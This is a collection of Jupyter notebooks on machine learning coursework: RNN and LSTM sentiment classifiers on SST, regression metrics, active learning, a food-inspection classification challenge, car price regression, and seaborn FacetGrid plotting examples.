> **Problem 3.2** *(2 points)* Implement a recurrent neural network (without using PyTorch's RNN module) with `tanh` activation, and use the output of the RNN at the final time step for the classification. Report the model's accuracy on the dev data.
> **Problem 3.3** *(2 points)* Show that the cross entropy computed above is equivalent to the negative log likelihood of the probability distribution.
> **Problem 3.4 (bonus)** *(1 points)* Why is it numerically unstable if you compute log on top of softmax?
## (Answer)
**Problem 3.1.**
(See the code below.) Validation accuracy of MLP after 10 epochs is 55.40%.
**Problem 3.2.**
(See the code below.) Validation accuracy of RNN after 10 epochs is 57.49%.
**Problem 3.3.**
The cross-entropy computed above is formulated as
$$ H(p,\hat{p}) = -\sum_x \sum_i p_i(x) \log \hat{p}_i(x) $$
where $p$ is the one-hot probability vector of the ground-truth label, and $\hat{p}$ is the predicted probability distribution. Since $p_i$ is 0 except for the ground-truth label dimension, the above form is equivalent to
$$ -\sum_x \log\hat{y}(x) $$
which is negative log likelihood (NLL).
**Problem 3.4.**
Softmax function computes the exponential term with logit values. However, if the logit values are too large, overflow can happen in our computer, i.e., it is only concentrated on the largest value. Likewise, if the logit values are too small, underflow happens and the values are equally assigned.
```
### Problem 3.1 ###
class SSTDataset(torch.utils.data.Dataset):
def __init__(self, split, length=16):
assert split in ['train', 'validation', 'test']
self._data = sst_dataset[split]
self.input_lst, self.label_lst = [], []
for data in self._data:
sentence = data['sentence']
tokens = sentence.split(' ')
input_ids = [word2id[word] if word in word2id else 1 for word in tokens] # UNK if word not found
if len(input_ids) < length:
input_ids = input_ids + [0] * (length - len(input_ids)) # PAD tokens at the end
else:
input_ids = input_ids[:length]
self.input_lst.append(torch.LongTensor(input_ids))
label = round(data['label'])
self.label_lst.append(label)
def __getitem__(self, idx):
return self.input_lst[idx], self.label_lst[idx]
def __len__(self):
return len(self._data)
trainset = SSTDataset('train')
validset = SSTDataset('validation')
train_loader = torch.utils.data.DataLoader(trainset, batch_size=16, shuffle=True)
valid_loader = torch.utils.data.DataLoader(validset, batch_size=16, shuffle=False)
baseline = Baseline(d=128, length=16).cuda()
cel = nn.CrossEntropyLoss()
optimizer = torch.optim.SGD(baseline.parameters(), lr=0.01)
for epoch in range(10):
baseline.train()
avg_loss = 0
for input, label in train_loader:
input = input.cuda()
label = label.cuda()
logits = baseline(input)
loss = cel(logits, label)
avg_loss += loss.item()
optimizer.zero_grad()
loss.backward()
optimizer.step()
print(f'Epoch {epoch+1}, Train Loss {avg_loss / len(train_loader)}')
baseline.eval()
acc, count = 0, 0
for input, label in valid_loader:
with torch.no_grad():
input = input.cuda()
logits = baseline(input)
_, preds = torch.max(logits, dim=1)
acc += (preds.cpu().data == label).sum().item()
count += float(input.size(0))
acc /= count
print(f'Epoch {epoch+1}, Valid Acc {acc}')
print('='*50)
print(f'Last Validation Accuracy: {acc}')
### Problem 3.2 ###
class RNN(nn.Module):
def __init__(self, seq_length, hidden_dim, embed_dim):
super(RNN, self).__init__()
self.seq_length = seq_length
self.hidden_dim = hidden_dim
self.embed_dim = embed_dim
self.embedding = nn.Embedding(len(vocab), embed_dim)
self.linear = nn.Linear(embed_dim + hidden_dim, hidden_dim)
self.classifier = nn.Linear(hidden_dim, 2)
self.tanh = nn.Tanh()
def forward(self, input):
assert self.seq_length == input.size(1) # batch_first
emb = self.embedding(input)
h_t = torch.autograd.Variable(torch.zeros(emb.size(0), self.hidden_dim)).cuda()
for seq in range(self.seq_length):
x = torch.cat([emb[:, seq, :], h_t], dim=-1)
h_t = self.tanh(self.linear(x))
out = self.classifier(h_t)
return out
rnn = RNN(seq_length=16, hidden_dim=64, embed_dim=64).cuda()
cel = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(rnn.parameters(), lr=0.001)
for epoch in range(10):
rnn.train()
avg_loss = 0
for input, label in train_loader:
logits = rnn(input.cuda())
loss = cel(logits, label.cuda())
avg_loss += loss.item()
optimizer.zero_grad()
loss.backward()
optimizer.step()
print(f'Epoch {epoch+1}, Train Loss {avg_loss / len(train_loader)}')
rnn.eval()
acc, count = 0, 0
for input, label in valid_loader:
with torch.no_grad():
logits = rnn(input.cuda())
_, preds = torch.max(logits, dim=1)
acc += (preds.cpu().data == label).sum().item()
count += float(input.size(0))
acc /= count
print(f'Epoch {epoch+1}, Valid Acc {acc}')
print('='*50)
print(f'Last Validation Accuracy: {acc}')
```
## 4. Text Classification with LSTM and Dropout
Replace your RNN module with an LSTM module. See Lecture slides 05 and 06 for the formal definition of LSTMs.
You will also use Dropout, which randomly makes each dimension zero with the probability of `p` and scale it by `1/(1-p)` if it is not zero during training. Put it either at the input or the output of the LSTM to prevent it from overfitting.
```
a = torch.FloatTensor([0.1, 0.3, 0.5, 0.7, 0.9])
dropout = nn.Dropout(0.5) # p=0.5
print(dropout(a))
```
> **Problem 4.1** *(3 points)* Implement and use LSTM (without using PyTorch's LSTM module) instead of vanilla RNN. Report the accuracy on the dev data.
> **Problem 4.2** *(2 points)* Use Dropout on LSTM (either at input or output). Report the accuracy on the dev data.
> **Problem 4.3 (bonus)** *(2 points)* Consider implementing bidirectional LSTM and two layers of LSTM. Concatenate the forward direction output at the final time step and the backward direction output at the first time step for the final classificaiton. Report your accuracy on dev data.
## (Answer)
**Problem 4.1.**
(See the code below.) Validation accuracy of LSTM after 10 epochs is 66.94%.
**Problem 4.2.**
(See the code below.) Validation accuracy of LSTM with Dropout after 10 epochs is 68.76%.
**Problem 4.3.**
(See the code below.) Validation accuracy of bi-directional stacked (2 layers) LSTM after 10 epochs is 64.03%.
```
### Problem 4.1 ###
import time
class LSTM(nn.Module):
def __init__(self, seq_length, hidden_dim, embed_dim, dropout=False, pretrained=False):
super(LSTM, self).__init__()
self.seq_length = seq_length
self.hidden_dim = hidden_dim
self.embed_dim = embed_dim
self.pretrained = pretrained
if not self.pretrained:
self.embedding = nn.Embedding(len(vocab), embed_dim)
self.linear_input = nn.Linear(embed_dim + hidden_dim, hidden_dim)
self.linear_forget = nn.Linear(embed_dim + hidden_dim, hidden_dim)
self.linear_cell = nn.Linear(embed_dim + hidden_dim, hidden_dim)
self.linear_output = nn.Linear(embed_dim + hidden_dim, hidden_dim)
self.classifier = nn.Linear(hidden_dim, 2)
self.sigmoid = nn.Sigmoid()
self.tanh = nn.Tanh()
if dropout:
self.dropout = nn.Dropout(p=0.5)
else:
self.dropout = None
def forward(self, input):
assert self.seq_length == input.size(1) # batch_first
if not self.pretrained:
emb = self.embedding(input)
else:
emb = input
h_t = torch.autograd.Variable(torch.zeros(emb.size(0), self.hidden_dim)).cuda()
c_t = torch.autograd.Variable(torch.zeros(emb.size(0), self.hidden_dim)).cuda()
for seq in range(self.seq_length):
i_t = self.sigmoid(self.linear_input(torch.cat([emb[:, seq, :], h_t], dim=-1)))
f_t = self.sigmoid(self.linear_forget(torch.cat([emb[:, seq, :], h_t], dim=-1)))
g_t = self.tanh(self.linear_cell(torch.cat([emb[:, seq, :], h_t], dim=-1)))
o_t = self.sigmoid(self.linear_output(torch.cat([emb[:, seq, :], h_t], dim=-1)))
c_t = f_t * c_t + i_t * g_t
h_t = o_t * self.tanh(c_t)
if self.dropout is not None:
h_t = self.dropout(h_t)
out = self.classifier(h_t)
return out
lstm = LSTM(seq_length=16, hidden_dim=64, embed_dim=64).cuda()
cel = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(lstm.parameters(), lr=0.01)
for epoch in range(10):
start = time.time()
lstm.train()
avg_loss = 0
for input, label in train_loader:
logits = lstm(input.cuda())
loss = cel(logits, label.cuda())
avg_loss += loss.item()
optimizer.zero_grad()
loss.backward()
optimizer.step()
end = time.time() - start
print(f'Epoch {epoch+1}, Train Loss {avg_loss / len(train_loader)}, Time {end}s')
lstm.eval()
acc, count = 0, 0
for input, label in valid_loader:
with torch.no_grad():
logits = lstm(input.cuda())
_, preds = torch.max(logits, dim=1)
acc += (preds.cpu().data == label).sum().item()
count += float(input.size(0))
acc /= count
print(f'Epoch {epoch+1}, Valid Acc {acc}')
print('='*50)
print(f'Last Validation Accuracy: {acc}')
### Problem 4.2 ###
lstm = LSTM(seq_length=16, hidden_dim=64, embed_dim=64, dropout=True).cuda()
cel = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(lstm.parameters(), lr=0.01)
for epoch in range(10):
lstm.train()
avg_loss = 0
for input, label in train_loader:
logits = lstm(input.cuda())
loss = cel(logits, label.cuda())
avg_loss += loss.item()
optimizer.zero_grad()
loss.backward()
optimizer.step()
print(f'Epoch {epoch+1}, Train Loss {avg_loss / len(train_loader)}')
lstm.eval()
acc, count = 0, 0
for input, label in valid_loader:
with torch.no_grad():
logits = lstm(input.cuda())
_, preds = torch.max(logits, dim=1)
acc += (preds.cpu().data == label).sum().item()
count += float(input.size(0))
acc /= count
print(f'Epoch {epoch+1}, Valid Acc {acc}')
print('='*50)
print(f'Last Validation Accuracy: {acc}')
### Problem 4.3 ###
class BiStackedLSTM(nn.Module):
def __init__(self, seq_length, hidden_dim, embed_dim, dropout=False):
super(BiStackedLSTM, self).__init__()
self.seq_length = seq_length
self.hidden_dim = hidden_dim
self.embed_dim = embed_dim
self.embedding = nn.Embedding(len(vocab), embed_dim)
self.layers = []
assert embed_dim == hidden_dim # I used the same dimension for convenience
for layer in range(2):
layer_dict = {}
layer_dict['input_gate'] = nn.Linear(embed_dim + hidden_dim, hidden_dim).cuda()
layer_dict['forget_gate'] = nn.Linear(embed_dim + hidden_dim, hidden_dim).cuda()
layer_dict['cell_gate'] = nn.Linear(embed_dim + hidden_dim, hidden_dim).cuda()
layer_dict['output_gate'] = nn.Linear(embed_dim + hidden_dim, hidden_dim).cuda()
self.layers.append(layer_dict)
self.classifier = nn.Linear(hidden_dim*2, 2)
self.sigmoid = nn.Sigmoid()
self.tanh = nn.Tanh()
if dropout:
self.dropout = nn.Dropout(p=0.5)
else:
self.dropout = None
def forward(self, input):
assert self.seq_length == input.size(1) # batch_first
emb = self.embedding(input)
h_t_bi = []
for direction in [range(self.seq_length), range(self.seq_length)[::-1]]:
# 1st layer
all_h_t = []
h_t = torch.autograd.Variable(torch.zeros(emb.size(0), self.hidden_dim)).cuda()
c_t = torch.autograd.Variable(torch.zeros(emb.size(0), self.hidden_dim)).cuda()
for seq in direction:
i_t = self.sigmoid(self.layers[0]['input_gate'](torch.cat([emb[:, seq, :], h_t], dim=-1)))
f_t = self.sigmoid(self.layers[0]['forget_gate'](torch.cat([emb[:, seq, :], h_t], dim=-1)))
g_t = self.tanh(self.layers[0]['cell_gate'](torch.cat([emb[:, seq, :], h_t], dim=-1)))
o_t = self.sigmoid(self.layers[0]['output_gate'](torch.cat([emb[:, seq, :], h_t], dim=-1)))
c_t = f_t * c_t + i_t * g_t
h_t = o_t * self.tanh(c_t)
if self.dropout is not None:
h_t = self.dropout(h_t)
all_h_t.append(h_t)
# 2nd layer
h_t = torch.autograd.Variable(torch.zeros(emb.size(0), self.hidden_dim)).cuda()
c_t = torch.autograd.Variable(torch.zeros(emb.size(0), self.hidden_dim)).cuda()
for seq in direction:
i_t = self.sigmoid(self.layers[1]['input_gate'](torch.cat([all_h_t[seq], h_t], dim=-1)))
f_t = self.sigmoid(self.layers[1]['forget_gate'](torch.cat([all_h_t[seq], h_t], dim=-1)))
g_t = self.tanh(self.layers[1]['cell_gate'](torch.cat([all_h_t[seq], h_t], dim=-1)))
o_t = self.sigmoid(self.layers[1]['output_gate'](torch.cat([all_h_t[seq], h_t], dim=-1)))
c_t = f_t * c_t + i_t * g_t
h_t = o_t * self.tanh(c_t)
if self.dropout is not None:
h_t = self.dropout(h_t)
h_t_bi.append(h_t) # last (or first) hidden state
h_t_concat = torch.cat(h_t_bi, dim=-1) # [B, hidden_dim*2]
out = self.classifier(h_t_concat)
return out
model = BiStackedLSTM(seq_length=16, hidden_dim=64, embed_dim=64, dropout=True).cuda()
cel = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.parameters(), lr=0.01)
for epoch in range(10):
model.train()
avg_loss = 0
for input, label in train_loader:
logits = model(input.cuda())
loss = cel(logits, label.cuda())
avg_loss += loss.item()
optimizer.zero_grad()
loss.backward()
optimizer.step()
print(f'Epoch {epoch+1}, Train Loss {avg_loss / len(train_loader)}')
model.eval()
acc, count = 0, 0
for input, label in valid_loader:
with torch.no_grad():
logits = model(input.cuda())
_, preds = torch.max(logits, dim=1)
acc += (preds.cpu().data == label).sum().item()
count += float(input.size(0))
acc /= count
print(f'Epoch {epoch+1}, Valid Acc {acc}')
print('='*50)
print(f'Last Validation Accuracy: {acc}')
```
## 5. Pretrained Word Vectors
The last step is to use pretrained vocabulary and word vectors. The prebuilt vocabulary will replace the vocabulary you built with SST training data, and the word vectors will replace the embedding vectors. You will observe the power of leveraging self-supservised pretrained models.
> **Problem 5.1 (bonus)** *(2 points)* Go to https://nlp.stanford.edu/projects/glove/ and download `glove.6B.zip`. Use these pretrained word vectors to replace word embeddings in your model from 4.2. Report the model's accuracy on the dev data.
## (Answer)
**Problem 5.1.**
(See the code below.) Validation accuracy of LSTM using the pretrained embeddings after 10 epochs training is 70.75%. Leveraging the self-supervised pretrained information helps the downstream classification task.
```
!wget https://nlp.stanford.edu/data/glove.6B.zip
!unzip glove.6B.zip
### Problem 5.1 - (1) ###
import numpy as np
vocab = ['PAD', 'UNK']
embedding = np.zeros((400002, 300), dtype=np.float32)
embedding[1,:] = np.random.randn(300) # random number for UNK
with open('./glove.6B.300d.txt') as f:
for i, line in enumerate(f.readlines()):
vocab.append(line.split(' ')[0])
embedding[i+2] = np.array(line.split(' ')[1:], dtype=np.float32)
word2id = {word: id_ for id_, word in enumerate(vocab)}
print('Vocabulary size: {}'.format(len(vocab)))
### Problem 5.1 - (2) ###
class SSTDataset(torch.utils.data.Dataset):
def __init__(self, split, length=16):
assert split in ['train', 'validation', 'test']
self._data = sst_dataset[split]
self.input_lst, self.label_lst = [], []
for data in self._data:
sentence = data['sentence']
tokens = sentence.split(' ')
input_ids = [word2id[word] if word in word2id else 1 for word in tokens] # UNK if word not found
if len(input_ids) < length:
input_ids = input_ids + [0] * (length - len(input_ids)) # PAD tokens at the end
else:
input_ids = input_ids[:length]
self.input_lst.append(torch.tensor(embedding[input_ids])) # use the pretrained embedding
label = round(data['label'])
self.label_lst.append(label)
def __getitem__(self, idx):
return self.input_lst[idx], self.label_lst[idx]
def __len__(self):
return len(self._data)
trainset = SSTDataset('train')
validset = SSTDataset('validation')
train_loader = torch.utils.data.DataLoader(trainset, batch_size=16, shuffle=True)
valid_loader = torch.utils.data.DataLoader(validset, batch_size=16, shuffle=False)
### Problem 5.1 - (3) ###
lstm = LSTM(seq_length=16, hidden_dim=128, embed_dim=300, dropout=True, pretrained=True).cuda()
cel = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(lstm.parameters(), lr=0.01)
for epoch in range(10):
lstm.train()
avg_loss = 0
for input, label in train_loader:
logits = lstm(input.cuda())
loss = cel(logits, label.cuda())
avg_loss += loss.item()
optimizer.zero_grad()
loss.backward()
optimizer.step()
print(f'Epoch {epoch+1}, Train Loss {avg_loss / len(train_loader)}')
lstm.eval()
acc, count = 0, 0
for input, label in valid_loader:
with torch.no_grad():
logits = lstm(input.cuda())
_, preds = torch.max(logits, dim=1)
acc += (preds.cpu().data == label).sum().item()
count += float(input.size(0))
acc /= count
print(f'Epoch {epoch+1}, Valid Acc {acc}')
print('='*50)
print(f'Last Validation Accuracy: {acc}')
```
|
github_jupyter
|
# Regression Metrics
Metrics covered:
#### 1) MSE, RMSE, R-squared
#### 2) MAE
#### 3) (R)MSPE, MAPE
#### 4) (R)MSLE
#### Notation

# MSE: Mean Squared Error

### How to evaluate MSE ?
First, you make baseline and check if your model beats this baseline.
`Baseline` - best constant model, it's different for different metrics.
For `MSE` best constant: `target mean`.
So just compute MSE baseline, and see if your model beats it.

## RMSE (Root Mean Squared Error)

So why we need RMSE?
- To make scale of errors like target scale.
`Similarity`: MSE and RMSE are the same minimization. It means if we minize MSE, then we automatically minimize RMSE.
`Difference`: not the same for gradient based models, because of different learning rates. (because 1/(2*sqrt(mse) of second derivative)
# R-squared

R^2 = 0 (not better than baseline)
R^2 = 1 (model explains 100% variability in data, not always means good model)
We can optimize R-squared by optimizing MSE, RMSE
# MAE: Mean Abosulte Error

- Not sensative to outliers, more robust than MSE, not influenced by outliers
- Mostly used in finance
How to evaluate MAE ?
Compute baseline MAE and compare it with your model, if your model beats baseline.

# General guide of regression metrics
- If `unusual objects are normal`, not ignore them and use MSE.
- Otherwise, if unusual objects are mistakes (entry mistakes, ETL mistakes, typos) use MAE
# Regression Metrics for Relative Error
Shop 1: predicted 9, sold 10, MSE = 1
Shop 2: predicted 999, sold 1000, MSE = 1
It's clear that Shop 2 did better, even MSE is the same. So we need metric to calculate relative error.
So if we adjust error to relative error.
Shop 1: predicted 9, sold 10, MSE = 1
Shop 2: predicted 900, sold 1000, MSE = 10'000
Shop 1: predicted 9, sold 10, relative_metric = 1
Shop 2: predicted 900, sold 1000, relative_metric = 1
# MSPE: Mean Squared Percentage Error (measures relative error)

To evaluate MSPE, check if your model beats baseline.

# MAPE: Mean Absolute Percentage Error (measures relative error)

To evaluate MAPE, check if your model beats baseline.

# RMSLE: Root Mean Square Logaritmic Error (measures relative error)

To evalute, compare with baseline. Best constant - `exp(y_target_mean)` instead of y_hat
|
github_jupyter
|
# Example of simple use of active learning API
Compare 3 query strategies: random sampling, uncertainty sampling, and active search.
Observe how we trade off between finding targets and accuracy.
# Imports
```
import warnings
warnings.filterwarnings(action='ignore', category=RuntimeWarning)
from matplotlib import pyplot as plt
import numpy as np
from sklearn.base import clone
from sklearn.datasets import make_moons
from sklearn.svm import SVC
import active_learning
from active_learning.utils import *
from active_learning.query_strats import random_sampling, uncertainty_sampling, active_search
%matplotlib inline
np.random.seed(0)
```
# Load toy data
Have a little binary classification task that is not linearly separable.
```
X, y = make_moons(noise=0.1, n_samples=200)
plt.scatter(X[y==0,0], X[y==0,1])
plt.scatter(X[y==1,0], X[y==1,1])
```
# Training Models
```
# Our basic classifier will be a SVM with rbf kernel
base_clf = SVC(probability=True)
# size of the initial labeled set
init_L_size = 5
# Make 30 queries
n_queries = 30
# set random state for consistency in training data
random_state = 123
```
### Random Sampling
```
random_experiment_data = perform_experiment(
X, y,
base_estimator=clone(base_clf),
query_strat=random_sampling,
n_queries=n_queries,
init_L_size=init_L_size,
random_state=random_state
)
```
### Uncertainty Sampling
```
uncertainty_experiment_data = perform_experiment(
X, y,
base_estimator=clone(base_clf),
query_strat=uncertainty_sampling,
n_queries=n_queries,
init_L_size=init_L_size,
random_state=random_state
)
```
### Active Search
```
as_experiment_data = perform_experiment(
X, y,
base_estimator=clone(base_clf),
query_strat=active_search,
n_queries=n_queries,
init_L_size=init_L_size,
random_state=random_state
)
```
# Compare
```
xx = np.arange(n_queries)
plt.plot(xx, random_experiment_data["accuracy"], label="Random")
plt.plot(xx, uncertainty_experiment_data["accuracy"], label="Uncertainty")
plt.plot(xx, as_experiment_data["accuracy"], label="AS")
plt.title("Accuracy on Test Set vs Num Queries")
plt.ylabel("accuracy")
plt.xlabel("# queries")
plt.legend()
plt.plot(xx, random_experiment_data["history"], label="Random")
plt.plot(xx, uncertainty_experiment_data["history"], label="Uncertainty")
plt.plot(xx, as_experiment_data["history"], label="AS")
plt.title("Number of targets found")
plt.ylabel("# of targets")
plt.xlabel("# queries")
plt.legend()
```
|
github_jupyter
|
<a href="https://colab.research.google.com/github/gagansingh23/DS-Unit-2-Applied-Modeling/blob/master/Gagan_Singh_DS11_Sprint_Challenge_7.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
_Lambda School Data Science, Unit 2_
# Applied Modeling Sprint Challenge: Predict Chicago food inspections 🍕
For this Sprint Challenge, you'll use a dataset with information from inspections of restaurants and other food establishments in Chicago from January 2010 to March 2019.
[See this PDF](https://data.cityofchicago.org/api/assets/BAD5301B-681A-4202-9D25-51B2CAE672FF) for descriptions of the data elements included in this dataset.
According to [Chicago Department of Public Health — Food Protection Services](https://www.chicago.gov/city/en/depts/cdph/provdrs/healthy_restaurants/svcs/food-protection-services.html), "Chicago is home to 16,000 food establishments like restaurants, grocery stores, bakeries, wholesalers, lunchrooms, mobile food vendors and more. Our business is food safety and sanitation with one goal, to prevent the spread of food-borne disease. We do this by inspecting food businesses, responding to complaints and food recalls."
#### Your challenge: Predict whether inspections failed
The target is the `Fail` column.
- When the food establishment failed the inspection, the target is `1`.
- When the establishment passed, the target is `0`.
#### Run this cell to install packages in Colab:
```
%%capture
import sys
if 'google.colab' in sys.modules:
# Install packages in Colab
!pip install category_encoders==2.*
!pip install eli5
!pip install pandas-profiling==2.*
!pip install pdpbox
!pip install shap
```
#### Run this cell to load the data:
```
import pandas as pd
train_url = 'https://drive.google.com/uc?export=download&id=13_tP9JpLcZHSPVpWcua4t2rY44K_s4H5'
test_url = 'https://drive.google.com/uc?export=download&id=1GkDHjsiGrzOXoF_xcYjdzBTSjOIi3g5a'
train = pd.read_csv(train_url)
test = pd.read_csv(test_url)
assert train.shape == (51916, 17)
assert test.shape == (17306, 17)
#Installers
import category_encoders as ce
from sklearn.model_selection import train_test_split
from xgboost import XGBClassifier
from sklearn.metrics import roc_auc_score
from pdpbox.pdp import pdp_isolate, pdp_plot
import matplotlib.pyplot as plt
from pdpbox.pdp import pdp_interact, pdp_interact_plot
```
### Part 1: Preprocessing
You may choose which features you want to use, and whether/how you will preprocess them. If you use categorical features, you may use any tools and techniques for encoding.
_To earn a score of 3 for this part, find and explain leakage. The dataset has a feature that will give you an ROC AUC score > 0.90 if you process and use the feature. Find the leakage and explain why the feature shouldn't be used in a real-world model to predict the results of future inspections._
### Part 2: Modeling
**Fit a model** with the train set. (You may use scikit-learn, xgboost, or any other library.) Use cross-validation or do a three-way split (train/validate/test) and **estimate your ROC AUC** validation score.
Use your model to **predict probabilities** for the test set. **Get an ROC AUC test score >= 0.60.**
_To earn a score of 3 for this part, get an ROC AUC test score >= 0.70 (without using the feature with leakage)._
### Part 3: Visualization
Make visualizations for model interpretation. (You may use any libraries.) Choose two of these types:
- Confusion Matrix
- Permutation Importances
- Partial Dependence Plot, 1 feature isolation
- Partial Dependence Plot, 2 features interaction
- Shapley Values
_To earn a score of 3 for this part, make four of these visualization types._
## Part 1: Preprocessing
> You may choose which features you want to use, and whether/how you will preprocess them. If you use categorical features, you may use any tools and techniques for encoding.
```
#Feature Selection
train.describe(exclude='number').nunique()
train.columns
train.Fail.value_counts(normalize=True)
train_pratice = train[train['Violations'].str.contains("HAZARD", na=False)]
train_pratice.Fail.value_counts(normalize=True)
target = 'Fail'
train_features = train.drop(columns=[target])
cardinality = train_features.select_dtypes(exclude='number').nunique()
categorical_features = cardinality[cardinality <= 40].index.tolist()
numerical_features = train_features.select_dtypes(include='number').columns.tolist()
categorical_features
features = categorical_features + numerical_features
X_train = train[features]
y_train = train[target]
X_val = val[features]
y_val = val[target]
X_test = test[features]
y_test = test[features]
#One Hot Encode all categorical variables with low cardinality
encoder = ce.OneHotEncoder()
X_train_encoded = encoder.fit_transform(X_train)
X_val_encoded = encoder.transform(X_val)
```
## Part 2: Modeling
> **Fit a model** with the train set. (You may use scikit-learn, xgboost, or any other library.) Use cross-validation or do a three-way split (train/validate/test) and **estimate your ROC AUC** validation score.
>
> Use your model to **predict probabilities** for the test set. **Get an ROC AUC test score >= 0.60.**
```
#Perform a three way split
train, val = train_test_split(train, train_size=0.90, test_size=0.10,
stratify=train['Fail'], random_state=42)
train.shape, val.shape, test.shape
#Fit The Model
model = XGBClassifier(n_estimators=100, n_jobs=-1)
model.fit(X_train_encoded, y_train)
#prediction on train set
y_pred = model.predict(X_val_encoded)
roc_auc_score(y_val, y_pred)
#Since its classifier, we need to use predicted probailities not discrete.
y_pred_proba = model.predict_proba(X_val_encoded)[:,-1]
print('Test ROC Score', roc_auc_score(y_val, y_pred_proba))
```
## Part 3: Visualization
> Make visualizations for model interpretation. (You may use any libraries.) Choose two of these types:
>
> - Permutation Importances
> - Partial Dependence Plot, 1 feature isolation
> - Partial Dependence Plot, 2 features interaction
> - Shapley Values
**Partial Dependance Plot, 1 feature isolation**
```
features
target = 'Fail'
features = train.columns.drop([target])
X = train[features]
y = train[target]
encoder = ce.OrdinalEncoder()
X_encoded = encoder.fit_transform(X)
model = XGBClassifier(n_estimators=100, random_state=42, n_jobs=-1)
model.fit(X_encoded, y)
from pdpbox import pdp
feature = 'Risk'
pdp_dist = pdp.pdp_isolate(model=model, dataset=X_encoded, model_features=features,
feature=feature)
pdp.pdp_plot(pdp_dist, feature);
```
**Partial Dependance Plot, 2 Feature Interaction**
```
features = ['Risk', 'Inspection Type']
interactions = pdp_interact(
model=model,
dataset=X_encoded,
model_features=X_encoded.columns,
features=features
)
pdp_interact_plot(interactions, plot_type='grid', feature_names=features);
```
|
github_jupyter
|
<a href="https://colab.research.google.com/github/aruanalucena/Car-Price-Prediction-Machine-Learning/blob/main/Car_Price_Prediction_.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# **Car Price Prediction with python**.
# **Previsão de carrro com Python**.


```
%%html
<h1><marquee style='width: 100% ', font color= 'arrows';><b>Car Price Prediction </b></marquee></h1>
```
# Importing the Dependencies
# <font color = 'blue'> Importando as bibliotecas
***
```
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split
from sklearn.linear_model import Lasso
from sklearn import metrics
```
# Data Collection and Data Analisys
# <font color='blue'> Coleta e Análise dos Dados
- loading the data from csv file to pandas DataFrame
-<font color='blue'> Carregando o dados em csv para o pandas DataFrame
***
```
car_data= pd.read_csv('/content/car data.csv')
print(car_data)
car_data.head()
```
- Checking the number of rows and columns in the data frame
-<font color='blue'> Checando numero de linhas e colunas do data frame
***
```
car_data.shape
```
- Getting some information about the dataset
-<font color='blue'> Pegando algumas informações dos dados
***
```
car_data.info()
```
- Checking the number of missing values
-<font color='blue'> Checando o numero de valores faltantes
***
```
car_data.isnull().sum()
```
- Checking the distribution of categorical data
-<font color='blue'> Checando a distribuição dos dados categoricos
***
```
print(car_data.Fuel_Type.value_counts())
print(car_data.Seller_Type.value_counts())
print(car_data.Transmission.value_counts())
```
- Encoding the Categorical Data
- <font color='blue'> Codificação de dados categoricos
```
# encoding "Fuel_Type"Column
car_data.replace({'Fuel_Type' :{'Petrol':0,'Diesel':1,'CNG':2}},inplace=True)
# encoding "Seller_Type"Column
car_data.replace({'Seller_Type' :{'Dealer':0,'Individual':1}},inplace=True)
# encoding "Transmission"Column
car_data.replace({'Transmission' :{'Manual':0,'Automatic':1}},inplace=True)
car_data.head()
```
- Splitting the data into Training data and Test data
- <font color='blue'> Divisão do dados en treino e teste
***
```
X = car_data.drop(['Car_Name', 'Selling_Price'], axis=1)
Y = car_data['Selling_Price']
print(X)
print(Y)
```
- Splitting the data target
- <font color='blue'>
***
```
X_train, X_test, Y_train, Y_test = train_test_split(X,Y, test_size=0.1, random_state=2)
```
- Model Training --> Linear Regression
-<font color='blue'>Modelo de Treino --> Linear regression
***
# Construindo o Modelo
- Training the Model
-<font color='blue'> Treinando o Modelo
***
- Loading the Model
- <font color='blue'>Carregando o Modelo
```
lin_reg_model = LinearRegression()
lin_reg_model.fit(X_train, Y_train)
```
# Avaliação do Modelo
- Model Evaluation
-<font color='blue'>Avaliação do Modelo
- Accuracy on training data
- <font color = 'blue'>Precisão dos dados de treino
***
```
train_data_prediction = lin_reg_model.predict(X_train)
print(train_data_prediction)
```
- R squared error
- <font color = 'blue'>R erro quadratico
***
```
error_score = metrics.r2_score(Y_train, train_data_prediction)
print(' R squared Error : ', error_score)
```
- Visualizing the actual Prices and predicted prices
- <font color = 'blue'>Visualização dos preços reais e dos preços previstos
***
```
plt.scatter(Y_train, train_data_prediction)
plt.xlabel( 'Actual Prices/Preço Atual')
plt.ylabel('Predicted Prices / Preço Previsto')
plt.title('Actual prices vs Predicted Price')
plt.show()
test_data_prediction = lin_reg_model.predict(X_test)
error_score = metrics.r2_score(Y_test, test_data_prediction)
print(" R squared Error : ", error_score)
plt.scatter(Y_test, test_data_prediction)
plt.xlabel( 'Actual Prices/Preço Atual')
plt.ylabel('Predicted Prices / Preço Previsto')
plt.title('Actual prices vs Predicted Price')
plt.show()
```
# Lasso Regression
```
lass_reg_model = Lasso()
lass_reg_model.fit(X_train, Y_train)
train_data_prediction = lass_reg_model.predict(X_train)
print(train_data_prediction)
train_data_prediction= lass_reg_model.predict(X_train)
error_score = metrics.r2_score(Y_test, test_data_prediction)
print(' R squared Error : ', error_score)
plt.scatter(Y_test, test_data_prediction)
plt.xlabel( 'Actual Prices/Preço Atual')
plt.ylabel('Predicted Prices / Preço Previsto')
plt.title('Actual prices vs Predicted Price')
plt.show()
```
# The end
***
```
```
|
github_jupyter
|
```
import seaborn as sns
import matplotlib.pyplot as plt
sns.set(style="ticks")
%matplotlib inline
import numpy as np
np.random.seed(sum(map(ord, "axis_grids")))
```
```
tips = sns.load_dataset("tips")
g = sns.FacetGrid(tips, col="time")
```
```
g = sns.FacetGrid(tips, col="time")
g.map(plt.hist, "tip");
```
```
g = sns.FacetGrid(tips, col="sex", hue="smoker")
g.map(plt.scatter, "total_bill", "tip", alpha=.7)
g.add_legend();
```
```
g = sns.FacetGrid(tips, row="smoker", col="time", margin_titles=True)
g.map(sns.regplot, "size", "total_bill", color=".3", fit_reg=False, x_jitter=.1);
```
```
g = sns.FacetGrid(tips, col="day", height=4, aspect=.5)
g.map(sns.barplot, "sex", "total_bill");
```
```
ordered_days = tips.day.value_counts().index
g = sns.FacetGrid(tips, row="day", row_order=ordered_days,
height=1.7, aspect=4,)
